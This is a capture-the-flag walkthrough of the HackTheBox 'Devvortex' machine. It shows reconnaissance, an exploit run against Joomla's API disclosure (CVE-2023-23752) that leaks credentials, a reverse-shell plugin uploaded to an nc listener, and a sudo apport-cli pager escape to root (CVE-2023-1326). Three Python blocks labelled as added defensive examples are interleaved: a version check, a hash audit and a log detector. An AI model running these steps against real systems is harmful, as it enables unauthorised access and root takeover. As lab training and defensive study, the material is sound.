HackTheBox : Devvortex WriteUp

This is my writeup for the Devvortex machine on the hackthebox.com platform. The machine was retired today, so it’s now possible to publish a writeup. Remember, this is just how I solved/owned the machine; there may be different and faster paths, but…

It’s an easy machine and the path to follow is pretty straightforward (too much for HTB?). Remember to add the IP/host to your /etc/hosts!

Recon

First of all I ran a classic nmap scan:

nmap -sC -sV -p- devvortex.htb     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-20 04:27 EDT
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.083s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.92 seconds

Now let’s check the web server directories and subdomains (as usual in HTB…):

gobuster dir -u http://devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://devvortex.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 178] [--> http://devvortex.htb/images/]
/css                  (Status: 301) [Size: 178] [--> http://devvortex.htb/css/]
/js                   (Status: 301) [Size: 178] [--> http://devvortex.htb/js/]


wfuzz -c -z file,/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hc 404,301,302 -u http://devvortex.htb -H "Host: FUZZ.devvortex.htb"   
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://devvortex.htb/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                    
=====================================================================

000000019:   200        501 L    1581 W     23221 Ch    "dev"  

The website on port 80 is just a classic website:

[Image: index.html (../images/htb-devvortex/00.png)]

But…there is a subdomain called dev, so let’s add it to the /etc/hosts file and check it:

curl -i -L http://dev.devvortex.htb/         

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 20 Apr 2024 08:33:41 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: 1daf6e3366587cf9ab315f8ef3b5ed78=6f4aed3sc567h1q6eemdfkoa3a; path=/; HttpOnly
x-frame-options: SAMEORIGIN
referrer-policy: strict-origin-when-cross-origin
cross-origin-opener-policy: same-origin
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Sat, 20 Apr 2024 08:33:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

or via browser:

[Image: api (../images/htb-devvortex/01.png)]

I ran gobuster again on it to check for other directories or pages:

gobuster dir -u http://dev.devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dev.devvortex.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/images/]
/home                 (Status: 200) [Size: 23221]
/media                (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/media/]
/templates            (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/templates/]
/modules              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/modules/]
/plugins              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/plugins/]
/includes             (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/includes/]
/language             (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/language/]
/components           (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/components/]
/api                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/api/]
/cache                (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/cache/]
/libraries            (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/libraries/]
/tmp                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/tmp/]
/layouts              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/layouts/]
/administrator        (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/administrator/]

The /api and /administrator directories seem interesting; let’s check the /api one first:

curl -sv http://dev.devvortex.htb/api/info
* Host dev.devvortex.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.242
*   Trying 10.10.11.242:80...
* Connected to dev.devvortex.htb (10.10.11.242) port 80
> GET /api/info HTTP/1.1
> Host: dev.devvortex.htb
> User-Agent: curl/8.5.0
> Accept: */*
> 
< HTTP/1.1 404 Not Found
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sat, 20 Apr 2024 08:42:33 GMT
< Content-Type: application/vnd.api+json; charset=utf-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Sat, 20 Apr 2024 08:42:33 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< 
* Connection #0 to host dev.devvortex.htb left intact
{"errors":[{"title":"Resource not found","code":404}]}

I’m in front of a Joomla installation, so let’s check the /administrator directory:

[Image: admin (../images/htb-devvortex/02.png)]

And it’s Joomla! Thanks to HackTricks, I’ll check the Joomla version just by fetching joomla.xml:

curl -sv http://dev.devvortex.htb/administrator/manifests/files/joomla.xml
* Host dev.devvortex.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.242
*   Trying 10.10.11.242:80...
* Connected to dev.devvortex.htb (10.10.11.242) port 80
> GET /administrator/manifests/files/joomla.xml HTTP/1.1
> Host: dev.devvortex.htb
> User-Agent: curl/8.5.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sat, 20 Apr 2024 08:46:18 GMT
< Content-Type: text/xml; charset=utf-8
< Content-Length: 1556
< Last-Modified: Tue, 13 Dec 2022 12:15:44 GMT
< Connection: keep-alive
< ETag: "63986cf0-614"
< Accept-Ranges: bytes
< 
<?xml version="1.0" encoding="UTF-8"?>
<extension type="file" method="upgrade">
        <name>files_joomla</name>
        <author>Joomla! Project</author>
        <authorEmail>admin@joomla.org</authorEmail>
        <authorUrl>www.joomla.org</authorUrl>
        <copyright>(C) 2019 Open Source Matters, Inc.</copyright>
        <license>GNU General Public License version 2 or later; see LICENSE.txt</license>
        <version>4.2.6</version>
        <creationDate>2022-12</creationDate>
        <description>FILES_JOOMLA_XML_DESCRIPTION</description>

        <scriptfile>administrator/components/com_admin/script.php</scriptfile>
.....

Initial foothold

I checked whether there is a CVE for this particular version of Joomla (4.2.6) and…boom:

https://vulncheck.com/blog/joomla-for-rce
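As an added check that is not part of the original writeup, the Python below reads the version out of a joomla.xml manifest like the one fetched above and tests it against the CVE-2023-23752 fix window (Joomla 4.0.0 up to 4.2.7 affected, fixed in 4.2.8, per the Joomla advisory); the manifest snippet is constructed from the output above.

```python
"""Joomla core manifest version triage (added example, not from the writeup)."""
import re
import xml.etree.ElementTree as ET

# Constructed sample: the part of administrator/manifests/files/joomla.xml that
# this check reads, copied from the curl output above.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<extension type="file" method="upgrade">
        <name>files_joomla</name>
        <author>Joomla! Project</author>
        <version>4.2.6</version>
        <creationDate>2022-12</creationDate>
</extension>
"""

# CVE-2023-23752 (unauthenticated API information disclosure) affects
# Joomla 4.0.0 through 4.2.7; 4.2.8 contains the fix.
CVE_2023_23752_FIRST_AFFECTED = (4, 0, 0)
CVE_2023_23752_FIXED = (4, 2, 8)


def parse_version(text: str) -> tuple:
    """Return (major, minor, patch) as ints, ignoring suffixes such as '-rc1'."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def manifest_version(xml_text: str) -> tuple:
    """Extract <version> from a Joomla 'files_joomla' manifest."""
    root = ET.fromstring(xml_text)
    if root.tag != "extension" or root.findtext("name") != "files_joomla":
        raise ValueError("not a Joomla core files manifest")
    return parse_version(root.findtext("version") or "")


def vulnerable_to_cve_2023_23752(version: tuple) -> bool:
    """True when the version falls inside the affected window."""
    return CVE_2023_23752_FIRST_AFFECTED <= version < CVE_2023_23752_FIXED


def triage(xml_text: str) -> dict:
    """Summarise what a defender needs: the installed version and patch status."""
    v = manifest_version(xml_text)
    return {
        "version": ".".join(map(str, v)),
        "cve_2023_23752": vulnerable_to_cve_2023_23752(v),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_MANIFEST))
```

Note that the manifest itself being readable without authentication is a second finding: the version string hands anyone the exact patch level.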

I checked for an exploit too and I found Acceis/exploit-CVE-2023-23752 on GitHub, as usual:

ruby exploit.rb http://dev.devvortex.htb

Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0

Well, the exploit gave me a lot of info: the username/password of the admin, another user and a MySQL login too. I tried to log in with the given username and password (lewis/P4ntherg0t1n5r3c0n##) and it’s working:

[Image: joomla (../images/htb-devvortex/03.png)]

Now I have several ways to start a reverse shell in PHP but, after further investigation, the only way is uploading a plugin. The theme way (uploading a PHP shell into the theme) is not possible due to the file permissions (read only). To create a plugin for Joomla I found a good article; first of all I downloaded the reverse shell from Pentestmonkey and changed the IP/port of my listener, of course. I renamed it shell.php.

The next step to create a Joomla plugin is creating an empty index.html file and the proper shell.xml manifest:

touch index.html

vi shell.xml          
<?xml version="1.0" encoding="utf-8"?>
<extension version="4.0" type="plugin" group="content">
        <name>shell</name>
        <author>gesu</author>
        <description>rev shell</description>
        <version>1.3</version>
        <files>
                <filename plugin="shell">shell.php</filename>
                <filename>index.html</filename>
        </files>
</extension>

Then I zipped shell.php, shell.xml and index.html into a shell.zip file. In the GUI I moved to System –> Install –> Extensions (http://dev.devvortex.htb/administrator/index.php?option=com_installer&view=install) and uploaded the shell.zip file:

[Image: shell.zip (../images/htb-devvortex/04.png)]

I started my listener and moved to System –> Manage –> Plugins, searched for “shell” and ticked/enabled it:

[Image: plugins (../images/htb-devvortex/05.png)]

I moved to my listener and:

nc -nvlp 6666   
                 
listening on [any] 6666 ...
connect to [10.10.16.46] from (UNKNOWN) [10.10.11.242] 51252
Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 10:32:54 up 45 min,  0 users,  load average: 0.02, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ pwd
/
$ uname -a
Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
$ python3 -c 'import pty; pty.spawn("/bin/bash")'  
www-data@devvortex:/$ 

I’m in as www-data! It worked!

First thing: I have a DB password, let’s try it!

mysql -u lewis joomla -p
mysql -u lewis joomla -p
Enter password: P4ntherg0t1n5r3c0n##

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 231
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show tables;
show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| sd4fg_action_log_config       |
...
| sd4fg_updates                 |
| sd4fg_user_keys               |
| sd4fg_user_mfa                |
| sd4fg_user_notes              |
| sd4fg_user_profiles           |
| sd4fg_user_usergroup_map      |
| sd4fg_usergroups              |
| sd4fg_users                   |
| sd4fg_viewlevels              |
...
+-------------------------------+
71 rows in set (0.00 sec)

mysql> select * from sd4fg_users;
;
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| id  | name       | username | email               | password                                                     | block | sendEmail | registerDate        | lastvisitDate       | activation | params                                                                                                                                                  | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| 649 | lewis      | lewis    | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |     0 |         1 | 2023-09-25 16:44:24 | 2024-04-20 10:21:08 | 0          |                                                                                                                                                         | NULL          |          0 |        |      |            0 |              |
| 650 | logan paul | logan    | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |     0 |         0 | 2023-09-26 19:15:42 | NULL                |            | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL          |          0 |        |      |            0 |              |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
2 rows in set (0.00 sec)

mysql> 

Oh well, I found the hash of the other user, logan. Let me check /etc/passwd:

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
logan:x:1000:1000:,,,:/home/logan:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false

www-data@devvortex:/$ ls -ltra /home    
ls -ltra /home
total 12
drwxr-xr-x  3 root  root  4096 Sep 26  2023 .
drwxr-xr-x 19 root  root  4096 Oct 26 15:12 ..
drwxr-xr-x  3 logan logan 4096 Nov 21 11:04 logan

The user logan has an account. Maybe…maybe…

I used hashes.com to identify the correct hash type of $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 (logan’s hash):

$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 - tequieromucho - Possible algorithms: bcrypt $2*$, Blowfish (Unix)

Oops…the hash was already cracked/solved.
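An added example, not from the writeup: a parser for the bcrypt string format that hashes.com identified above, used the way a defender would, to audit the hashes in a Joomla users table for a weak work factor. The two hashes are the ones dumped from sd4fg_users above; the MIN_COST threshold is my assumption.

```python
"""Parse bcrypt modular-crypt-format strings and audit their cost (added example)."""
import re
from dataclasses import dataclass

# A bcrypt string is $2y$10$<22-char salt><31-char digest>, using bcrypt's own
# base64 alphabet ./A-Za-z0-9. "2y" is the PHP password_hash() variant Joomla uses.
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

# Hashes as found in sd4fg_users above.
LEWIS_HASH = "$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u"
LOGAN_HASH = "$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12"

# Lowest cost we accept in an audit; 2^12 rounds is a common floor (assumption).
MIN_COST = 12


@dataclass
class BcryptHash:
    variant: str   # "2a", "2b", "2y", ...
    cost: int      # log2 of the number of key-expansion rounds
    salt: str      # 22 chars = 128-bit salt
    digest: str    # 31 chars = 184 bits of the 192-bit output

    @property
    def rounds(self) -> int:
        return 2 ** self.cost


def parse_bcrypt(s: str) -> BcryptHash:
    """Split a bcrypt string into its fields, validating the layout."""
    m = BCRYPT_RE.match(s)
    if not m:
        raise ValueError("not a bcrypt hash")
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    if not 4 <= cost <= 31:
        raise ValueError(f"cost {cost} out of range")
    return BcryptHash(variant, cost, salt, digest)


def audit_user_hashes(rows) -> list:
    """rows: iterable of (username, password) pairs as dumped from sd4fg_users.
    Returns (user, reason) findings for non-bcrypt hashes or low cost."""
    findings = []
    for user, h in rows:
        try:
            parsed = parse_bcrypt(h)
        except ValueError as e:
            findings.append((user, f"non-bcrypt hash: {e}"))
            continue
        if parsed.cost < MIN_COST:
            findings.append((user, f"bcrypt cost {parsed.cost} "
                                   f"({parsed.rounds} rounds) below {MIN_COST}"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_user_hashes([("lewis", LEWIS_HASH), ("logan", LOGAN_HASH)]):
        print(f"{user}: {reason}")
```

The cost factor is what bounds an offline guessing attack once a hash leaks the way it did here; the salt and digest fields are only parsed, never reversed.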

ssh logan@devvortex.htb
logan@devvortex.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)

...

Last login: Sat Apr 20 10:37:44 2024 from 10.10.14.56
logan@devvortex:~$ whoami
logan
logan@devvortex:~$ cat user.txt 
57REDACTED74

user done!

Privilege Escalation

Let’s check if I have some sudo commands enabled…

logan@devvortex:~$ sudo -l
[sudo] password for logan: 
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
    
logan@devvortex:~$ apport-cli --version
2.20.11


apport-cli? Let me check for a CVE and…I found an X (Twitter) post explaining CVE-2023-1326. Let’s try:
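From the defender’s side, an added example that is not part of the writeup: a scan over sudo’s syslog lines that flags apport-cli invocations naming a pager on the command line or pointing at a crash file in a user-writable directory, which is the shape of the CVE-2023-1326 abuse. The auth.log lines are constructed in sudo’s default log format, modelled on the session above.

```python
"""Flag sudo apport-cli invocations matching the CVE-2023-1326 pattern (added example)."""
import os
import re

# sudo's default syslog line: "<user> : TTY=... ; PWD=... ; USER=... ; COMMAND=..."
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.+)$"
)
PAGERS = {"less", "more", "vi", "vim", "view", "nano"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# Constructed auth.log lines (not taken from the machine) mimicking the
# sudo calls made in the writeup, plus one unrelated pam line.
SAMPLE_AUTH_LOG = """\
Apr 20 10:44:10 devvortex sudo:    logan : TTY=pts/0 ; PWD=/home/logan ; USER=root ; COMMAND=/usr/bin/apport-cli --version
Apr 20 10:45:30 devvortex sudo:    logan : TTY=pts/0 ; PWD=/home/logan ; USER=root ; COMMAND=/usr/bin/apport-cli -c /tmp/xxx.crash less
Apr 20 10:45:31 devvortex sudo: pam_unix(sudo:session): session opened for user root by logan(uid=0)
"""


def parse_sudo_line(line: str):
    """Return the sudo fields as a dict, or None for lines that are not sudo commands."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None


def apport_cli_findings(cmd: str) -> list:
    """Reasons an apport-cli command line looks like a pager-escape attempt."""
    argv = cmd.split()
    if not argv or os.path.basename(argv[0]) != "apport-cli":
        return []
    reasons = []
    for i, arg in enumerate(argv[1:], start=1):
        if arg in ("-c", "--crash-file") and i + 1 < len(argv):
            path = argv[i + 1]
            if path.startswith(WRITABLE_DIRS):
                reasons.append(f"crash file in user-writable location: {path}")
        if arg in PAGERS:
            reasons.append(f"pager/editor named on the command line: {arg}")
    return reasons


def scan_auth_log(text: str) -> list:
    """Return (user, target_user, command, reasons) for suspicious sudo apport-cli calls."""
    hits = []
    for line in text.splitlines():
        rec = parse_sudo_line(line)
        if rec is None:
            continue
        reasons = apport_cli_findings(rec["cmd"])
        if reasons:
            hits.append((rec["user"], rec["target"], rec["cmd"], reasons))
    return hits


if __name__ == "__main__":
    for user, target, cmd, reasons in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"{user} -> {target}: {cmd}\n  " + "\n  ".join(reasons))
```

The benign `--version` call produces no finding, so the rule keys on how apport-cli is driven rather than on its mere use under sudo; the lasting fix is removing the sudoers entry or patching apport.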

logan@devvortex:~$ touch /tmp/xxx.crash
logan@devvortex:~$ sudo apport-cli -c /tmp/xxx.crash less

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.
.....................

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (1.6 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): !

What would you like to do? Your options are:
  S: Send report (1.6 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): v

(write !/bin/bash)

root@devvortex:/home/logan# 

So, I touched xxx.crash, ran apport-cli, pressed !, pressed v and wrote !/bin/bash…done.

root@devvortex:/home/logan# whoami
root
root@devvortex:/home/logan# cat /root/root.txt 
ffREDACTED43

and root done!